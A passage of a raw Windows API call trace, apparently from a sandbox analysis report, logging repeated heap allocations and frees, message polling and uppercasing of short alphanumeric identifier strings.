PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0264.613] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0264.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0264.614] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0264.614] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0264.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0264.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0264.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0264.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0264.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0264.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.617] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0264.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0264.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0264.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.618] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.618] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.618] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0264.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.618] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.618] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0264.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.619] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0264.619] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.619] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.619] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.619] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.620] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0264.620] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.621] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0264.621] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.621] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0264.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.621] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.621] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0264.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.622] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0264.622] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.622] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0264.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.622] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.623] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.623] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0264.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.629] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.629] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.629] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.630] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0264.630] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.630] HeapFree 